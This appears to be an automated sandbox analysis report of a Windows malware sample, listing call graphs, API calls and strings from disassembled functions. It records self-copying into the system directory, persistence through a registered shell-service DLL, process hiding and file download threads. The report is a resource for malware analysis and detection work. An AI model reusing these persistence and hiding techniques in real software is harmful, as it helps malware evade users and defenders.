3130->3131 3132 404f77 strcat 3131->3132 3133 404f8a strcat rand 3131->3133 3132->3133 3134 404fb5 strcat 3133->3134 3135 404fc8 rand 3133->3135 3134->3135 3136 404fda rand sprintf 3135->3136 3137 404ffd 7 API calls 3135->3137 3136->3137 3137->3049 3139 4044b6 3138->3139 3140 4044d9 sprintf 3139->3140 3141 40452a sprintf rand 3139->3141 3140->3139 3141->3120 3141->3121 3142 401b33 3145 401aa4 3142->3145 3143 401b13 3144 401ae6 sprintf 3147 40129c 3144->3147 3145->3143 3145->3144 3148 4012a9 CreateFileA 3147->3148 3149 4079e4 3147->3149 3150 4012db ReadFile CloseHandle 3148->3150 3151 4012d7 3148->3151 3149->3148 3150->3151 3151->3143 3152 4036b3 CreateFileA 3153 4036e7 SetFilePointer 3152->3153 3154 4036e3 3152->3154 3155 403701 3153->3155 3155->3155 3156 403708 WriteFile WriteFile CloseHandle 3155->3156 3156->3154 2762 406ff6 2763 4071a4 2762->2763 2764 40701f 2762->2764 2765 40717e 2763->2765 2766 4071be DestroyWindow 2763->2766 2767 407021 2764->2767 2768 40702f 2764->2768 2766->2765 2769 407184 2767->2769 2770 40702a 2767->2770 2771 407289 GetWindowTextA 2768->2771 2772 40703a 2768->2772 2769->2765 2778 407198 PostQuitMessage 2769->2778 2773 4077cc DefWindowProcA 2770->2773 2776 4072c9 GetWindowTextA 2771->2776 2777 4072a9 MessageBoxA SetFocus 2771->2777 2774 407041 2772->2774 2775 40705c 2772->2775 2773->2765 2774->2770 2774->2773 2783 4071cb 2774->2783 2779 407149 2775->2779 2818 405ffa 2775->2818 2780 407322 2776->2780 2781 407302 MessageBoxA SetFocus 2776->2781 2777->2765 2778->2765 2779->2765 2825 406075 2779->2825 2787 407337 MessageBoxA SetFocus 2780->2787 2795 407357 2780->2795 2781->2765 2783->2765 2788 407224 SetTextColor 2783->2788 2790 407233 SetTextColor 2783->2790 2786 405ffa 3 API calls 2789 40709b GetWindowRect 2786->2789 2787->2765 2791 40723d SetBkColor CreateBrushIndirect 2788->2791 2789->2779 2792 4070be GetWindowRect 2789->2792 2790->2791 2791->2765 2792->2779 2794 4070d4 2792->2794 2793 4073a7 sprintf GetWindowTextA 2797 40740f sprintf GetWindowTextA 2793->2797 2798 4073ef MessageBoxA SetFocus 2793->2798 2794->2779 2799 407112 MoveWindow 2794->2799 2795->2793 2796 407376 MessageBoxA SetFocus 2795->2796 2796->2765 2800 407477 sprintf GetWindowTextA 2797->2800 2801 407457 MessageBoxA SetFocus 2797->2801 2798->2765 2799->2779 2802 4074d9 2800->2802 2803 4074b9 MessageBoxA SetFocus 2800->2803 2801->2765 2804 4074ee MessageBoxA SetFocus 2802->2804 2806 40750e 2802->2806 2803->2765 2804->2765 2805 40755e sprintf GetWindowTextA 2808 4075a6 MessageBoxA SetFocus 2805->2808 2809 4075c6 2805->2809 2806->2805 2807 40752d MessageBoxA SetFocus 2806->2807 2807->2765 2808->2765 2810 407627 sprintf CreateFileA SetFilePointer 2809->2810 2812 4075e5 MessageBoxA SetFocus 2809->2812 2811 40768e 2810->2811 2811->2811 2813 407695 WriteFile WriteFile 2811->2813 2812->2765 2814 4076db 2813->2814 2814->2814 2815 4076e2 6 API calls 2814->2815 2816 40776e 2815->2816 2816->2816 2817 407775 WriteFile WriteFile CloseHandle ShowWindow 2816->2817 2817->2765 2819 4079e4 2818->2819 2820 406007 GetWindow 2819->2820 2821 406020 2820->2821 2822 406028 GetClassNameA 2821->2822 2823 406024 2821->2823 2824 40605f GetWindow 2821->2824 2822->2821 2823->2786 2824->2821 2826 405ffa 3 API calls 2825->2826 2827 406096 2826->2827 2828 405ffa 3 API calls 2827->2828 2829 4060a3 10 API calls 2828->2829 2830 406224 SendMessageA 2829->2830 2831 40623a SendMessageA 2829->2831 2832 40624e CreateWindowExA CreateWindowExA 2830->2832 2831->2832 2833 406333 2832->2833 2834 4062cb sprintf SendMessageA sprintf SendMessageA 2833->2834 2835 40633c 34 API calls 2833->2835 2834->2833 2835->2765 2972 401219 2973 40121f __GetMainArgs 2972->2973 2974 407980 173 API calls 2973->2974 2975 401284 exit 2974->2975 2976 40109a 2984 40109b 2976->2984 2977 40117f 2978 40118e signal 2977->2978 2979 4011a8 signal 2978->2979 2980 4011c9 2978->2980 2979->2980 2981 40117b 2979->2981 2980->2981 2982 4011ce signal raise 2980->2982 2982->2981 2984->2977 2984->2978 2984->2981 2985 40107a RtlUnwind 2984->2985 2985->2984 2836 40237b 2837 402333 _sleep 2836->2837 2838 402355 2836->2838 2839 401b9f 23 API calls 2837->2839 2840 40234c 2839->2840 2840->2837 2840->2838 2986 40109b 2987 40117f 2986->2987 2994 4010c3 2986->2994 2988 40118e signal 2987->2988 2989 4011a8 signal 2988->2989 2990 4011c9 2988->2990 2989->2990 2991 40117b 2989->2991 2990->2991 2992 4011ce signal raise 2990->2992 2992->2991 2994->2988 2994->2991 2995 40107a RtlUnwind 2994->2995 2995->2994 2996 40129b 2997 4079e4 2996->2997 2998 4012a9 CreateFileA 2997->2998 2999 4012db ReadFile CloseHandle 2998->2999 3000 4012d7 2998->3000 2999->3000 2712 40365e 2713 403664 GetFileSize LocalAlloc 2712->2713 2714 403684 ReadFile CloseHandle 2713->2714 2716 4036ae 2714->2716 2531 40121f __GetMainArgs 2534 407980 GetCommandLineA 2531->2534 2535 407991 strchr 2534->2535 2537 4079a6 2534->2537 2536 4079cf GetModuleHandleA 2535->2536 2535->2537 2540 406c29 OpenMutexA 2536->2540 2537->2536 2541 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2540->2541 2542 406c5f CloseHandle exit 2540->2542 2543 406cd6 2541->2543 2542->2541 2544 406ce4 rand 2543->2544 2545 406e07 9 API calls 2543->2545 2547 406d5f 2544->2547 2587 402e06 2545->2587 2549 406d69 rand 2547->2549 2550 406d2f rand 2547->2550 2553 406d8a sprintf CopyFileA 2549->2553 2554 406d7c 2549->2554 2550->2547 2551 406f65 2603 4023a7 CreateThread CloseHandle 2551->2603 2552 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2552->2551 2564 403ce9 rand 2553->2564 2554->2553 2558 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2560 406fdc GetMessageA 2558->2560 2655 4068b0 2558->2655 2673 40682b 2558->2673 2562 406fc4 TranslateMessage DispatchMessageA 2560->2562 2563 401284 exit 2560->2563 2562->2560 2565 403d27 2564->2565 2566 403d2e 2564->2566 2575 403f68 rand 2565->2575 2604 403619 CreateFileA 2566->2604 2569 403d47 memcpy memset 2571 403da1 rand rand rand rand memcpy 2569->2571 2572 403e64 2571->2572 2610 403bbe 2572->2610 2576 404002 2575->2576 2577 403fd4 rand 2576->2577 2578 404009 rand 2576->2578 2577->2576 2579 40402a 6 API calls 2578->2579 2580 40401c 2578->2580 2615 404148 RegCreateKeyExA 2579->2615 2580->2579 2582 4040f5 2583 404148 3 API calls 2582->2583 2584 404125 2583->2584 2585 404148 3 API calls 2584->2585 2586 40413a WinExec ExitProcess 2585->2586 2588 402e13 2587->2588 2618 402822 6 API calls 2588->2618 2590 402e1b GetVersion 2591 402e2e 2590->2591 2592 402e79 LoadLibraryA GetProcAddress 2591->2592 2602 402ef6 2591->2602 2592->2591 2593 4033ce GetVersion 2593->2551 2593->2552 2595 4030e5 GetModuleHandleA 2595->2602 2596 40314c VirtualQuery 2597 4031b1 IsBadWritePtr 2596->2597 2596->2602 2597->2602 2598 402f98 GlobalMemoryStatus 2598->2602 2599 402f6f IsBadReadPtr 2599->2602 2601 403059 CloseHandle 2601->2602 2602->2593 2602->2595 2602->2596 2602->2598 2602->2599 2602->2601 2619 40289a 2602->2619 2623 402cd7 2602->2623 2603->2558 2632 4022ee 2603->2632 2605 403664 GetFileSize LocalAlloc 2604->2605 2607 40364e 2604->2607 2606 403684 ReadFile CloseHandle 2605->2606 2609 4036ae 2606->2609 2607->2605 2607->2609 2609->2565 2609->2569 2612 403bfd 2610->2612 2611 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2611->2565 2612->2611 2613 403c20 rand 2612->2613 2614 403c80 memset memcpy memcpy 2612->2614 2613->2612 2614->2612 2616 404193 2615->2616 2616->2616 2617 40419a RegSetValueExA RegCloseKey 2616->2617 2617->2582 2618->2590 2620 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2619->2620 2622 4029cd 2620->2622 2622->2602 2624 402ceb 2623->2624 2626 402d13 2624->2626 2627 402a72 2624->2627 2626->2602 2630 402a89 2627->2630 2628 402cd2 2628->2626 2629 402b2a GetModuleHandleA GetProcAddress 2629->2630 2630->2628 2630->2629 2631 402cad GetCurrentProcessId 2630->2631 2631->2630 2633 402333 _sleep 2632->2633 2637 401b9f 2633->2637 2653 4079e4 2637->2653 2654 4079e5 2653->2654 2654->2654 2661 4068c7 2655->2661 2657 406c0c _sleep 2657->2661 2658 403619 5 API calls 2658->2661 2660 406c01 LocalFree 2660->2657 2661->2657 2661->2658 2661->2660 2662 406941 sscanf 2661->2662 2664 406a84 atoi 2661->2664 2665 4069a4 sprintf sprintf 2661->2665 2666 4069db GetWindowsDirectoryA sprintf strcat 2661->2666 2669 406add lstrlenA 2661->2669 2670 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2661->2670 2671 406b9b lstrlenA 2661->2671 2672 406bbe CreateThread CloseHandle 2661->2672 2677 405f5b lstrlenA lstrlenA LocalAlloc 2661->2677 2682 4043bf 2661->2682 2662->2661 2663 406972 rand 2662->2663 2663->2661 2664->2661 2668 406aad sprintf 2664->2668 2667 406a27 DeleteFileA sprintf WinExec 2665->2667 2666->2667 2667->2661 2668->2661 2669->2661 2670->2661 2671->2661 2672->2661 2674 40683b 2673->2674 2690 406753 CreateFileA 2674->2690 2688 407a04 2677->2688 2679 405f9b lstrlenA 2689 407a04 2679->2689 2681 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2681->2661 2683 4043dc 2682->2683 2684 40441a 2683->2684 2685 4043e2 memcpy 2683->2685 2686 404441 lstrlenA 2684->2686 2687 40442f 2684->2687 2685->2687 2686->2687 2687->2661 2688->2679 2689->2681 2691 40678f GetFileSize CloseHandle 2690->2691 2697 40681a _sleep 2690->2697 2698 4013cc RegOpenKeyExA 2691->2698 2697->2674 2699 4013fa 2698->2699 2700 4013fe RegQueryValueExA RegCloseKey 2698->2700 2699->2697 2701 4054d7 6 API calls 2699->2701 2700->2699 2702 405586 2701->2702 2703 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2702->2703 2704 40560e 2703->2704 2704->2697 2705 401348 RegCreateKeyExA 2704->2705 2706 40138a RegSetValueExA RegCloseKey 2705->2706 2707 401386 2705->2707 2706->2707 2707->2697

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Opbieagi$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-951892311
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
